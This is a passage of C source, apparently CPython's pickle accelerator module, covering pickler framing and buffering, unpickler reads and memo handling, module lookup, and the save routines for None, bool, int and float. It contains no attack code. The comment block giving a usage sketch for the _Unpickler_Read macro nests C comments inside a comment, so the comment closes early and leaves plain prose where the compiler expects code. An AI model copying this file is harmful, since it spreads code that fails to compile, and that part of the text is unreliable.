// self->mt_used is always < PY_SSIZE_T_MAX, so this can't overflow.
size_t desired_size = (self->mt_used > 50000 ? 2 : 4) * self->mt_used;
return _PyMemoTable_ResizeTable(self, desired_size);
}
#undef MT_MINSIZE
#undef PERTURB_SHIFT
/*************************************************************************/
static int
_Pickler_ClearBuffer(PicklerObject *self)
{
Py_XSETREF(self->output_buffer,
PyBytes_FromStringAndSize(NULL, self->max_output_len));
if (self->output_buffer == NULL)
return -1;
self->output_len = 0;
self->frame_start = -1;
return 0;
}
static void
_write_size64(char *out, size_t value)
{
size_t i;
Py_BUILD_ASSERT(sizeof(size_t) <= 8);
for (i = 0; i < sizeof(size_t); i++) {
out[i] = (unsigned char)((value >> (8 * i)) & 0xff);
}
for (i = sizeof(size_t); i < 8; i++) {
out[i] = 0;
}
}
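/* Byte-order sketch: _write_size64(out, 0x0102) stores the little-endian
 * sequence 02 01 00 00 00 00 00 00, i.e. the least significant byte first,
 * padded with zeros out to 8 bytes. */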
static int
_Pickler_CommitFrame(PicklerObject *self)
{
size_t frame_len;
char *qdata;
if (!self->framing || self->frame_start == -1)
return 0;
frame_len = self->output_len - self->frame_start - FRAME_HEADER_SIZE;
qdata = PyBytes_AS_STRING(self->output_buffer) + self->frame_start;
if (frame_len >= FRAME_SIZE_MIN) {
qdata[0] = FRAME;
_write_size64(qdata + 1, frame_len);
}
else {
memmove(qdata, qdata + FRAME_HEADER_SIZE, frame_len);
self->output_len -= FRAME_HEADER_SIZE;
}
self->frame_start = -1;
return 0;
}
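/* Resulting layout of a committed frame, as a sketch: the FRAME opcode
 * ('\x95'), then the 8-byte little-endian payload length written by
 * _write_size64(), then the buffered opcodes themselves. Frames shorter than
 * FRAME_SIZE_MIN skip the header entirely; the payload is shifted back over
 * the reserved header bytes instead. */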
static PyObject *
_Pickler_GetString(PicklerObject *self)
{
PyObject *output_buffer = self->output_buffer;
assert(self->output_buffer != NULL);
if (_Pickler_CommitFrame(self))
return NULL;
self->output_buffer = NULL;
/* Resize down to exact size */
if (_PyBytes_Resize(&output_buffer, self->output_len) < 0)
return NULL;
return output_buffer;
}
static int
_Pickler_FlushToFile(PicklerObject *self)
{
PyObject *output, *result;
assert(self->write != NULL);
/* This will commit the frame first */
output = _Pickler_GetString(self);
if (output == NULL)
return -1;
result = _Pickle_FastCall(self->write, output);
Py_XDECREF(result);
return (result == NULL) ? -1 : 0;
}
static int
_Pickler_OpcodeBoundary(PicklerObject *self)
{
Py_ssize_t frame_len;
if (!self->framing || self->frame_start == -1) {
return 0;
}
frame_len = self->output_len - self->frame_start - FRAME_HEADER_SIZE;
if (frame_len >= FRAME_SIZE_TARGET) {
if(_Pickler_CommitFrame(self)) {
return -1;
}
/* Flush the content of the committed frame to the underlying
* file and reuse the pickler buffer for the next frame so as
* to limit memory usage when dumping large complex objects to
* a file.
*
* self->write is NULL when called via dumps.
*/
if (self->write != NULL) {
if (_Pickler_FlushToFile(self) < 0) {
return -1;
}
if (_Pickler_ClearBuffer(self) < 0) {
return -1;
}
}
}
return 0;
}
static Py_ssize_t
_Pickler_Write(PicklerObject *self, const char *s, Py_ssize_t data_len)
{
Py_ssize_t i, n, required;
char *buffer;
int need_new_frame;
assert(s != NULL);
need_new_frame = (self->framing && self->frame_start == -1);
if (need_new_frame)
n = data_len + FRAME_HEADER_SIZE;
else
n = data_len;
required = self->output_len + n;
if (required > self->max_output_len) {
/* Make place in buffer for the pickle chunk */
if (self->output_len >= PY_SSIZE_T_MAX / 2 - n) {
PyErr_NoMemory();
return -1;
}
self->max_output_len = (self->output_len + n) / 2 * 3;
if (_PyBytes_Resize(&self->output_buffer, self->max_output_len) < 0)
return -1;
}
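/* Note (informal): the resize above grows the buffer to roughly 1.5 times the
 * space actually required, which amortizes the cost of many small writes. */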
buffer = PyBytes_AS_STRING(self->output_buffer);
if (need_new_frame) {
/* Setup new frame */
Py_ssize_t frame_start = self->output_len;
self->frame_start = frame_start;
for (i = 0; i < FRAME_HEADER_SIZE; i++) {
/* Write an invalid value, for debugging */
buffer[frame_start + i] = 0xFE;
}
self->output_len += FRAME_HEADER_SIZE;
}
if (data_len < 8) {
/* This is faster than memcpy when the string is short. */
for (i = 0; i < data_len; i++) {
buffer[self->output_len + i] = s[i];
}
}
else {
memcpy(buffer + self->output_len, s, data_len);
}
self->output_len += data_len;
return data_len;
}
static PicklerObject *
_Pickler_New(void)
{
PicklerObject *self;
self = PyObject_GC_New(PicklerObject, &Pickler_Type);
if (self == NULL)
return NULL;
self->pers_func = NULL;
self->dispatch_table = NULL;
self->write = NULL;
self->proto = 0;
self->bin = 0;
self->framing = 0;
self->frame_start = -1;
self->fast = 0;
self->fast_nesting = 0;
self->fix_imports = 0;
self->fast_memo = NULL;
self->max_output_len = WRITE_BUF_SIZE;
self->output_len = 0;
self->memo = PyMemoTable_New();
self->output_buffer = PyBytes_FromStringAndSize(NULL,
self->max_output_len);
if (self->memo == NULL || self->output_buffer == NULL) {
Py_DECREF(self);
return NULL;
}
return self;
}
static int
_Pickler_SetProtocol(PicklerObject *self, PyObject *protocol, int fix_imports)
{
long proto;
if (protocol == NULL || protocol == Py_None) {
proto = DEFAULT_PROTOCOL;
}
else {
proto = PyLong_AsLong(protocol);
if (proto < 0) {
if (proto == -1 && PyErr_Occurred())
return -1;
proto = HIGHEST_PROTOCOL;
}
else if (proto > HIGHEST_PROTOCOL) {
PyErr_Format(PyExc_ValueError, "pickle protocol must be <= %d",
HIGHEST_PROTOCOL);
return -1;
}
}
self->proto = (int)proto;
self->bin = proto > 0;
self->fix_imports = fix_imports && proto < 3;
return 0;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Pickler_SetOutputStream(PicklerObject *self, PyObject *file)
{
_Py_IDENTIFIER(write);
assert(file != NULL);
if (_PyObject_LookupAttrId(file, &PyId_write, &self->write) < 0) {
return -1;
}
if (self->write == NULL) {
PyErr_SetString(PyExc_TypeError,
"file must have a 'write' attribute");
return -1;
}
return 0;
}
/* Returns the size of the input on success, -1 on failure. This takes its
own reference to `input`. */
static Py_ssize_t
_Unpickler_SetStringInput(UnpicklerObject *self, PyObject *input)
{
if (self->buffer.buf != NULL)
PyBuffer_Release(&self->buffer);
if (PyObject_GetBuffer(input, &self->buffer, PyBUF_CONTIG_RO) < 0)
return -1;
self->input_buffer = self->buffer.buf;
self->input_len = self->buffer.len;
self->next_read_idx = 0;
self->prefetched_idx = self->input_len;
return self->input_len;
}
static int
bad_readline(void)
{
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "pickle data was truncated");
return -1;
}
static int
_Unpickler_SkipConsumed(UnpicklerObject *self)
{
Py_ssize_t consumed;
PyObject *r;
consumed = self->next_read_idx - self->prefetched_idx;
if (consumed <= 0)
return 0;
assert(self->peek); /* otherwise we did something wrong */
/* This makes a useless copy... */
r = PyObject_CallFunction(self->read, "n", consumed);
if (r == NULL)
return -1;
Py_DECREF(r);
self->prefetched_idx = self->next_read_idx;
return 0;
}
static const Py_ssize_t READ_WHOLE_LINE = -1;
/* If reading from a file, we need to only pull the bytes we need, since there
may be multiple pickle objects arranged contiguously in the same input
buffer.
If `n` is READ_WHOLE_LINE, read a whole line. Otherwise, read up to `n`
bytes from the input stream/buffer.
Update the unpickler's input buffer with the newly-read data. Returns -1 on
failure; on success, returns the number of bytes read from the file.
On success, self->input_len will be 0; this is intentional so that when
unpickling from a file, the "we've run out of data" code paths will trigger,
causing the Unpickler to go back to the file for more data. Use the returned
size to tell you how much data you can process. */
static Py_ssize_t
_Unpickler_ReadFromFile(UnpicklerObject *self, Py_ssize_t n)
{
PyObject *data;
Py_ssize_t read_size;
assert(self->read != NULL);
if (_Unpickler_SkipConsumed(self) < 0)
return -1;
if (n == READ_WHOLE_LINE) {
data = _PyObject_CallNoArg(self->readline);
}
else {
PyObject *len;
/* Prefetch some data without advancing the file pointer, if possible */
if (self->peek && n < PREFETCH) {
len = PyLong_FromSsize_t(PREFETCH);
if (len == NULL)
return -1;
data = _Pickle_FastCall(self->peek, len);
if (data == NULL) {
if (!PyErr_ExceptionMatches(PyExc_NotImplementedError))
return -1;
/* peek() is probably not supported by the given file object */
PyErr_Clear();
Py_CLEAR(self->peek);
}
else {
read_size = _Unpickler_SetStringInput(self, data);
Py_DECREF(data);
self->prefetched_idx = 0;
if (n <= read_size)
return n;
}
}
len = PyLong_FromSsize_t(n);
if (len == NULL)
return -1;
data = _Pickle_FastCall(self->read, len);
}
if (data == NULL)
return -1;
read_size = _Unpickler_SetStringInput(self, data);
Py_DECREF(data);
return read_size;
}
/* Don't call it directly: use _Unpickler_Read() */
static Py_ssize_t
_Unpickler_ReadImpl(UnpicklerObject *self, char **s, Py_ssize_t n)
{
Py_ssize_t num_read;
*s = NULL;
if (self->next_read_idx > PY_SSIZE_T_MAX - n) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"read would overflow (invalid bytecode)");
return -1;
}
/* This case is handled by the _Unpickler_Read() macro for efficiency */
assert(self->next_read_idx + n > self->input_len);
if (!self->read)
return bad_readline();
num_read = _Unpickler_ReadFromFile(self, n);
if (num_read < 0)
return -1;
if (num_read < n)
return bad_readline();
*s = self->input_buffer;
self->next_read_idx = n;
return n;
}
/* Read `n` bytes from the unpickler's data source, storing the result in `*s`.
This should be used for all data reads, rather than accessing the unpickler's
input buffer directly. This method deals correctly with reading from input
streams, which the input buffer doesn't deal with.
Note that when reading from a file-like object, self->next_read_idx won't
be updated (it should remain at 0 for the entire unpickling process). You
should use this function's return value to know how many bytes you can
consume.
Returns -1 (with an exception set) on failure. On success, return the
number of chars read. */
#define _Unpickler_Read(self, s, n) \
(((n) <= (self)->input_len - (self)->next_read_idx) \
? (*(s) = (self)->input_buffer + (self)->next_read_idx, \
(self)->next_read_idx += (n), \
(n)) \
: _Unpickler_ReadImpl(self, (s), (n)))
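/* Usage sketch (hypothetical caller, not taken from this file):
 *
 *     char *s;
 *     if (_Unpickler_Read(self, &s, 4) < 0)
 *         return -1;           /* error already set */
 *     /* s now points at 4 readable bytes */
 *
 * The fast path in the macro is taken when the bytes are already buffered;
 * otherwise _Unpickler_ReadImpl() refills the buffer from the file object. */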
static Py_ssize_t
_Unpickler_CopyLine(UnpicklerObject *self, char *line, Py_ssize_t len,
char **result)
{
char *input_line = PyMem_Realloc(self->input_line, len + 1);
if (input_line == NULL) {
PyErr_NoMemory();
return -1;
}
memcpy(input_line, line, len);
input_line[len] = '\0';
self->input_line = input_line;
*result = self->input_line;
return len;
}
/* Read a line from the input stream/buffer. If we run off the end of the input
before hitting \n, raise an error.
Returns the number of chars read, or -1 on failure. */
static Py_ssize_t
_Unpickler_Readline(UnpicklerObject *self, char **result)
{
Py_ssize_t i, num_read;
for (i = self->next_read_idx; i < self->input_len; i++) {
if (self->input_buffer[i] == '\n') {
char *line_start = self->input_buffer + self->next_read_idx;
num_read = i - self->next_read_idx + 1;
self->next_read_idx = i + 1;
return _Unpickler_CopyLine(self, line_start, num_read, result);
}
}
if (!self->read)
return bad_readline();
num_read = _Unpickler_ReadFromFile(self, READ_WHOLE_LINE);
if (num_read < 0)
return -1;
if (num_read == 0 || self->input_buffer[num_read - 1] != '\n')
return bad_readline();
self->next_read_idx = num_read;
return _Unpickler_CopyLine(self, self->input_buffer, num_read, result);
}
/* Returns -1 (with an exception set) on failure, 0 on success. The memo array
will be modified in place. */
static int
_Unpickler_ResizeMemoList(UnpicklerObject *self, size_t new_size)
{
size_t i;
assert(new_size > self->memo_size);
PyObject **memo_new = self->memo;
PyMem_RESIZE(memo_new, PyObject *, new_size);
if (memo_new == NULL) {
PyErr_NoMemory();
return -1;
}
self->memo = memo_new;
for (i = self->memo_size; i < new_size; i++)
self->memo[i] = NULL;
self->memo_size = new_size;
return 0;
}
/* Returns NULL if idx is out of bounds. */
static PyObject *
_Unpickler_MemoGet(UnpicklerObject *self, size_t idx)
{
if (idx >= self->memo_size)
return NULL;
return self->memo[idx];
}
/* Returns -1 (with an exception set) on failure, 0 on success.
This takes its own reference to `value`. */
static int
_Unpickler_MemoPut(UnpicklerObject *self, size_t idx, PyObject *value)
{
PyObject *old_item;
if (idx >= self->memo_size) {
if (_Unpickler_ResizeMemoList(self, idx * 2) < 0)
return -1;
assert(idx < self->memo_size);
}
Py_INCREF(value);
old_item = self->memo[idx];
self->memo[idx] = value;
if (old_item != NULL) {
Py_DECREF(old_item);
}
else {
self->memo_len++;
}
return 0;
}
static PyObject **
_Unpickler_NewMemo(Py_ssize_t new_size)
{
PyObject **memo = PyMem_NEW(PyObject *, new_size);
if (memo == NULL) {
PyErr_NoMemory();
return NULL;
}
memset(memo, 0, new_size * sizeof(PyObject *));
return memo;
}
/* Free the unpickler's memo, taking care to decref any items left in it. */
static void
_Unpickler_MemoCleanup(UnpicklerObject *self)
{
Py_ssize_t i;
PyObject **memo = self->memo;
if (self->memo == NULL)
return;
self->memo = NULL;
i = self->memo_size;
while (--i >= 0) {
Py_XDECREF(memo[i]);
}
PyMem_FREE(memo);
}
static UnpicklerObject *
_Unpickler_New(void)
{
UnpicklerObject *self;
self = PyObject_GC_New(UnpicklerObject, &Unpickler_Type);
if (self == NULL)
return NULL;
self->pers_func = NULL;
self->input_buffer = NULL;
self->input_line = NULL;
self->input_len = 0;
self->next_read_idx = 0;
self->prefetched_idx = 0;
self->read = NULL;
self->readline = NULL;
self->peek = NULL;
self->encoding = NULL;
self->errors = NULL;
self->marks = NULL;
self->num_marks = 0;
self->marks_size = 0;
self->proto = 0;
self->fix_imports = 0;
memset(&self->buffer, 0, sizeof(Py_buffer));
self->memo_size = 32;
self->memo_len = 0;
self->memo = _Unpickler_NewMemo(self->memo_size);
self->stack = (Pdata *)Pdata_New();
if (self->memo == NULL || self->stack == NULL) {
Py_DECREF(self);
return NULL;
}
return self;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Unpickler_SetInputStream(UnpicklerObject *self, PyObject *file)
{
_Py_IDENTIFIER(peek);
_Py_IDENTIFIER(read);
_Py_IDENTIFIER(readline);
if (_PyObject_LookupAttrId(file, &PyId_peek, &self->peek) < 0) {
return -1;
}
(void)_PyObject_LookupAttrId(file, &PyId_read, &self->read);
(void)_PyObject_LookupAttrId(file, &PyId_readline, &self->readline);
if (self->readline == NULL || self->read == NULL) {
if (!PyErr_Occurred()) {
PyErr_SetString(PyExc_TypeError,
"file must have 'read' and 'readline' attributes");
}
Py_CLEAR(self->read);
Py_CLEAR(self->readline);
Py_CLEAR(self->peek);
return -1;
}
return 0;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Unpickler_SetInputEncoding(UnpicklerObject *self,
const char *encoding,
const char *errors)
{
if (encoding == NULL)
encoding = "ASCII";
if (errors == NULL)
errors = "strict";
self->encoding = _PyMem_Strdup(encoding);
self->errors = _PyMem_Strdup(errors);
if (self->encoding == NULL || self->errors == NULL) {
PyErr_NoMemory();
return -1;
}
return 0;
}
/* Generate a GET opcode for an object stored in the memo. */
static int
memo_get(PicklerObject *self, PyObject *key)
{
Py_ssize_t *value;
char pdata[30];
Py_ssize_t len;
value = PyMemoTable_Get(self->memo, key);
if (value == NULL) {
PyErr_SetObject(PyExc_KeyError, key);
return -1;
}
if (!self->bin) {
pdata[0] = GET;
PyOS_snprintf(pdata + 1, sizeof(pdata) - 1,
"%" PY_FORMAT_SIZE_T "d\n", *value);
len = strlen(pdata);
}
else {
if (*value < 256) {
pdata[0] = BINGET;
pdata[1] = (unsigned char)(*value & 0xff);
len = 2;
}
else if ((size_t)*value <= 0xffffffffUL) {
pdata[0] = LONG_BINGET;
pdata[1] = (unsigned char)(*value & 0xff);
pdata[2] = (unsigned char)((*value >> 8) & 0xff);
pdata[3] = (unsigned char)((*value >> 16) & 0xff);
pdata[4] = (unsigned char)((*value >> 24) & 0xff);
len = 5;
}
else { /* unlikely */
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"memo id too large for LONG_BINGET");
return -1;
}
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
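/* Encoding sketch for the binary GET opcodes above (illustrative byte values):
 * a memo id of 5 is written as BINGET ('h') followed by the single byte 0x05,
 * while an id of 300 (0x12c) needs LONG_BINGET ('j') followed by the
 * little-endian bytes 2c 01 00 00. */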
/* Store an object in the memo, assign it a new unique ID based on the number
of objects currently stored in the memo and generate a PUT opcode. */
static int
memo_put(PicklerObject *self, PyObject *obj)
{
char pdata[30];
Py_ssize_t len;
Py_ssize_t idx;
const char memoize_op = MEMOIZE;
if (self->fast)
return 0;
idx = PyMemoTable_Size(self->memo);
if (PyMemoTable_Set(self->memo, obj, idx) < 0)
return -1;
if (self->proto >= 4) {
if (_Pickler_Write(self, &memoize_op, 1) < 0)
return -1;
return 0;
}
else if (!self->bin) {
pdata[0] = PUT;
PyOS_snprintf(pdata + 1, sizeof(pdata) - 1,
"%" PY_FORMAT_SIZE_T "d\n", idx);
len = strlen(pdata);
}
else {
if (idx < 256) {
pdata[0] = BINPUT;
pdata[1] = (unsigned char)idx;
len = 2;
}
else if ((size_t)idx <= 0xffffffffUL) {
pdata[0] = LONG_BINPUT;
pdata[1] = (unsigned char)(idx & 0xff);
pdata[2] = (unsigned char)((idx >> 8) & 0xff);
pdata[3] = (unsigned char)((idx >> 16) & 0xff);
pdata[4] = (unsigned char)((idx >> 24) & 0xff);
len = 5;
}
else { /* unlikely */
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"memo id too large for LONG_BINPUT");
return -1;
}
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
static PyObject *
get_dotted_path(PyObject *obj, PyObject *name)
{
_Py_static_string(PyId_dot, ".");
PyObject *dotted_path;
Py_ssize_t i, n;
dotted_path = PyUnicode_Split(name, _PyUnicode_FromId(&PyId_dot), -1);
if (dotted_path == NULL)
return NULL;
n = PyList_GET_SIZE(dotted_path);
assert(n >= 1);
for (i = 0; i < n; i++) {
PyObject *subpath = PyList_GET_ITEM(dotted_path, i);
if (_PyUnicode_EqualToASCIIString(subpath, "<locals>")) {
if (obj == NULL)
PyErr_Format(PyExc_AttributeError,
"Can't pickle local object %R", name);
else
PyErr_Format(PyExc_AttributeError,
"Can't pickle local attribute %R on %R", name, obj);
Py_DECREF(dotted_path);
return NULL;
}
}
return dotted_path;
}
static PyObject *
get_deep_attribute(PyObject *obj, PyObject *names, PyObject **pparent)
{
Py_ssize_t i, n;
PyObject *parent = NULL;
assert(PyList_CheckExact(names));
Py_INCREF(obj);
n = PyList_GET_SIZE(names);
for (i = 0; i < n; i++) {
PyObject *name = PyList_GET_ITEM(names, i);
Py_XDECREF(parent);
parent = obj;
(void)_PyObject_LookupAttr(parent, name, &obj);
if (obj == NULL) {
Py_DECREF(parent);
return NULL;
}
}
if (pparent != NULL)
*pparent = parent;
else
Py_XDECREF(parent);
return obj;
}
static PyObject *
getattribute(PyObject *obj, PyObject *name, int allow_qualname)
{
PyObject *dotted_path, *attr;
if (allow_qualname) {
dotted_path = get_dotted_path(obj, name);
if (dotted_path == NULL)
return NULL;
attr = get_deep_attribute(obj, dotted_path, NULL);
Py_DECREF(dotted_path);
}
else {
(void)_PyObject_LookupAttr(obj, name, &attr);
}
if (attr == NULL && !PyErr_Occurred()) {
PyErr_Format(PyExc_AttributeError,
"Can't get attribute %R on %R", name, obj);
}
return attr;
}
static int
_checkmodule(PyObject *module_name, PyObject *module,
PyObject *global, PyObject *dotted_path)
{
if (module == Py_None) {
return -1;
}
if (PyUnicode_Check(module_name) &&
_PyUnicode_EqualToASCIIString(module_name, "__main__")) {
return -1;
}
PyObject *candidate = get_deep_attribute(module, dotted_path, NULL);
if (candidate == NULL) {
return -1;
}
if (candidate != global) {
Py_DECREF(candidate);
return -1;
}
Py_DECREF(candidate);
return 0;
}
static PyObject *
whichmodule(PyObject *global, PyObject *dotted_path)
{
PyObject *module_name;
PyObject *module = NULL;
Py_ssize_t i;
PyObject *modules;
_Py_IDENTIFIER(__module__);
_Py_IDENTIFIER(modules);
_Py_IDENTIFIER(__main__);
if (_PyObject_LookupAttrId(global, &PyId___module__, &module_name) < 0) {
return NULL;
}
if (module_name) {
/* In some rare cases (e.g., bound methods of extension types),
__module__ can be None. If it is so, then search sys.modules for
the module of global. */
if (module_name != Py_None)
return module_name;
Py_CLEAR(module_name);
}
assert(module_name == NULL);
/* Fallback on walking sys.modules */
modules = _PySys_GetObjectId(&PyId_modules);
if (modules == NULL) {
PyErr_SetString(PyExc_RuntimeError, "unable to get sys.modules");
return NULL;
}
if (PyDict_CheckExact(modules)) {
i = 0;
while (PyDict_Next(modules, &i, &module_name, &module)) {
if (_checkmodule(module_name, module, global, dotted_path) == 0) {
Py_INCREF(module_name);
return module_name;
}
if (PyErr_Occurred()) {
return NULL;
}
}
}
else {
PyObject *iterator = PyObject_GetIter(modules);
if (iterator == NULL) {
return NULL;
}
while ((module_name = PyIter_Next(iterator))) {
module = PyObject_GetItem(modules, module_name);
if (module == NULL) {
Py_DECREF(module_name);
Py_DECREF(iterator);
return NULL;
}
if (_checkmodule(module_name, module, global, dotted_path) == 0) {
Py_DECREF(module);
Py_DECREF(iterator);
return module_name;
}
Py_DECREF(module);
Py_DECREF(module_name);
if (PyErr_Occurred()) {
Py_DECREF(iterator);
return NULL;
}
}
Py_DECREF(iterator);
}
/* If no module is found, use __main__. */
module_name = _PyUnicode_FromId(&PyId___main__);
Py_XINCREF(module_name);
return module_name;
}
/* fast_save_enter() and fast_save_leave() are guards against recursive
objects when Pickler is used with the "fast mode" (i.e., with object
memoization disabled). If the nesting of a list or dict object exceeds
FAST_NESTING_LIMIT, these guards will start keeping an internal
reference to the seen list or dict objects and checking whether these objects
are recursive. These are not strictly necessary, since save() has a
hard-coded recursion limit, but they give a nicer error message than the
typical RuntimeError. */
static int
fast_save_enter(PicklerObject *self, PyObject *obj)
{
/* if fast_nesting < 0, we're doing an error exit. */
if (++self->fast_nesting >= FAST_NESTING_LIMIT) {
PyObject *key = NULL;
if (self->fast_memo == NULL) {
self->fast_memo = PyDict_New();
if (self->fast_memo == NULL) {
self->fast_nesting = -1;
return 0;
}
}
key = PyLong_FromVoidPtr(obj);
if (key == NULL) {
self->fast_nesting = -1;
return 0;
}
if (PyDict_GetItemWithError(self->fast_memo, key)) {
Py_DECREF(key);
PyErr_Format(PyExc_ValueError,
"fast mode: can't pickle cyclic objects "
"including object type %.200s at %p",
obj->ob_type->tp_name, obj);
self->fast_nesting = -1;
return 0;
}
if (PyErr_Occurred()) {
Py_DECREF(key);
self->fast_nesting = -1;
return 0;
}
if (PyDict_SetItem(self->fast_memo, key, Py_None) < 0) {
Py_DECREF(key);
self->fast_nesting = -1;
return 0;
}
Py_DECREF(key);
}
return 1;
}
static int
fast_save_leave(PicklerObject *self, PyObject *obj)
{
if (self->fast_nesting-- >= FAST_NESTING_LIMIT) {
PyObject *key = PyLong_FromVoidPtr(obj);
if (key == NULL)
return 0;
if (PyDict_DelItem(self->fast_memo, key) < 0) {
Py_DECREF(key);
return 0;
}
Py_DECREF(key);
}
return 1;
}
static int
save_none(PicklerObject *self, PyObject *obj)
{
const char none_op = NONE;
if (_Pickler_Write(self, &none_op, 1) < 0)
return -1;
return 0;
}
static int
save_bool(PicklerObject *self, PyObject *obj)
{
if (self->proto >= 2) {
const char bool_op = (obj == Py_True) ? NEWTRUE : NEWFALSE;
if (_Pickler_Write(self, &bool_op, 1) < 0)
return -1;
}
else {
/* These aren't opcodes -- they're ways to pickle bools before protocol 2
* so that unpicklers written before bools were introduced unpickle them
* as ints, but unpicklers after can recognize that bools were intended.
* Note that protocol 2 added direct ways to pickle bools.
*/
const char *bool_str = (obj == Py_True) ? "I01\n" : "I00\n";
if (_Pickler_Write(self, bool_str, strlen(bool_str)) < 0)
return -1;
}
return 0;
}
static int
save_long(PicklerObject *self, PyObject *obj)
{
PyObject *repr = NULL;
Py_ssize_t size;
long val;
int overflow;
int status = 0;
val= PyLong_AsLongAndOverflow(obj, &overflow);
if (!overflow && (sizeof(long) <= 4 ||
(val <= 0x7fffffffL && val >= (-0x7fffffffL - 1))))
{
/* result fits in a signed 4-byte integer.
Note: we can't use -0x80000000L in the above condition because some
compilers (e.g., MSVC) will promote 0x80000000L to an unsigned type
before applying the unary minus when sizeof(long) <= 4. The
resulting value stays unsigned which is commonly not what we want,
so MSVC happily warns us about it. However, that result would have
been fine because we guard for sizeof(long) <= 4 which turns the
condition true in that particular case. */
char pdata[32];
Py_ssize_t len = 0;
if (self->bin) {
pdata[1] = (unsigned char)(val & 0xff);
pdata[2] = (unsigned char)((val >> 8) & 0xff);
pdata[3] = (unsigned char)((val >> 16) & 0xff);
pdata[4] = (unsigned char)((val >> 24) & 0xff);
if ((pdata[4] != 0) || (pdata[3] != 0)) {
pdata[0] = BININT;
len = 5;
}
else if (pdata[2] != 0) {
pdata[0] = BININT2;
len = 3;
}
else {
pdata[0] = BININT1;
len = 2;
}
}
else {
sprintf(pdata, "%c%ld\n", INT, val);
len = strlen(pdata);
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
assert(!PyErr_Occurred());
if (self->proto >= 2) {
/* Linear-time pickling. */
size_t nbits;
size_t nbytes;
unsigned char *pdata;
char header[5];
int i;
int sign = _PyLong_Sign(obj);
if (sign == 0) {
header[0] = LONG1;
header[1] = 0; /* It's 0 -- an empty bytestring. */
if (_Pickler_Write(self, header, 2) < 0)
goto error;
return 0;
}
nbits = _PyLong_NumBits(obj);
if (nbits == (size_t)-1 && PyErr_Occurred())
goto error;
/* How many bytes do we need? There are nbits >> 3 full
* bytes of data, and nbits & 7 leftover bits. If there
* are any leftover bits, then we clearly need another
* byte. What's not so obvious is that we *probably*
* need another byte even if there aren't any leftovers:
* the most-significant bit of the most-significant byte
* acts like a sign bit, and it's usually got a sense
* opposite of the one we need. The exception is ints
* of the form -(2**(8*j-1)) for j > 0. Such an int is
* its own 256's-complement, so has the right sign bit
* even without the extra byte. That's a pain to check
* for in advance, though, so we always grab an extra
* byte at the start, and cut it back later if possible.
*/
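/* Small worked example (informal): pickling 255 gives nbits = 8, so
 * nbytes = 2 and the little-endian signed bytes ff 00; the opcode stream is
 * then LONG1, length 2, ff, 00. The extra zero byte is exactly the "extra
 * byte" described above, keeping the sign bit clear for a positive value. */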
nbytes = (nbits >> 3) + 1;
if (nbytes > 0x7fffffffL) {
PyErr_SetString(PyExc_OverflowError,
"int too large to pickle");
goto error;
}
repr = PyBytes_FromStringAndSize(NULL, (Py_ssize_t)nbytes);
if (repr == NULL)
goto error;
pdata = (unsigned char *)PyBytes_AS_STRING(repr);
i = _PyLong_AsByteArray((PyLongObject *)obj,
pdata, nbytes,
1 /* little endian */ , 1 /* signed */ );
if (i < 0)
goto error;
/* If the int is negative, this may be a byte more than
* needed. This is so iff the MSB is all redundant sign
* bits.
*/
if (sign < 0 &&
nbytes > 1 &&
pdata[nbytes - 1] == 0xff &&
(pdata[nbytes - 2] & 0x80) != 0) {
nbytes--;
}
if (nbytes < 256) {
header[0] = LONG1;
header[1] = (unsigned char)nbytes;
size = 2;
}
else {
header[0] = LONG4;
size = (Py_ssize_t) nbytes;
for (i = 1; i < 5; i++) {
header[i] = (unsigned char)(size & 0xff);
size >>= 8;
}
size = 5;
}
if (_Pickler_Write(self, header, size) < 0 ||
_Pickler_Write(self, (char *)pdata, (int)nbytes) < 0)
goto error;
}
else {
const char long_op = LONG;
const char *string;
/* proto < 2: write the repr and newline. This is quadratic-time (in
the number of digits), in both directions. We add a trailing 'L'
to the repr, for compatibility with Python 2.x. */
repr = PyObject_Repr(obj);
if (repr == NULL)
goto error;
string = PyUnicode_AsUTF8AndSize(repr, &size);
if (string == NULL)
goto error;
if (_Pickler_Write(self, &long_op, 1) < 0 ||
_Pickler_Write(self, string, size) < 0 ||
_Pickler_Write(self, "L\n", 2) < 0)
goto error;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(repr);
return status;
}
static int
save_float(PicklerObject *self, PyObject *obj)
{
double x = PyFloat_AS_DOUBLE((PyFloatObject *)obj);
if (self->bin) {
char pdata[9];
pdata[0] = BINFLOAT;
if (_PyFloat_Pack8(x, (unsigned char *)&pdata[1], 0) < 0)
return -1;
if (_Pickler_Write(self, pdata, 9) < 0)
return -1;
}
else {
int result = -1;
char *buf = NULL;
char op = FLOAT;
if (_Pickler_Write(self, &op, 1) < 0)
goto done;
buf = PyOS_double_to_string(x, 'r', 0, Py_DTSF_ADD_DOT_0, NULL);
if (!buf) {
PyErr_NoMemory();
goto done;
}
if (_Pickler_Write(self, buf, strlen(buf)) < 0)
goto done;
if (_Pickler_Write(self, "\n", 1) < 0)
goto done;
result = 0;
done:
PyMem_Free(buf);
return result;
}
return 0;
}
/* Perform direct write of the header and payload of the binary object.
The large contiguous data is written directly into the underlying file
object, bypassing the output_buffer of the Pickler. We intentionally
do not insert a protocol 4 frame opcode to make it possible to optimize
file.read calls in the loader.
*/
static int
_Pickler_write_bytes(PicklerObject *self,
const char *header, Py_ssize_t header_size,
const char *data, Py_ssize_t data_size,
PyObject *payload)
{
int bypass_buffer = (data_size >= FRAME_SIZE_TARGET);
int framing = self->framing;
if (bypass_buffer) {
assert(self->output_buffer != NULL);
/* Commit the previous frame. */
if (_Pickler_CommitFrame(self)) {
return -1;
}
/* Disable framing temporarily */
self->framing = 0;
}
if (_Pickler_Write(self, header, header_size) < 0) {
return -1;
}
if (bypass_buffer && self->write != NULL) {
/* Bypass the in-memory buffer to directly stream large data
into the underlying file object. */
PyObject *result, *mem = NULL;
/* Dump the output buffer to the file. */
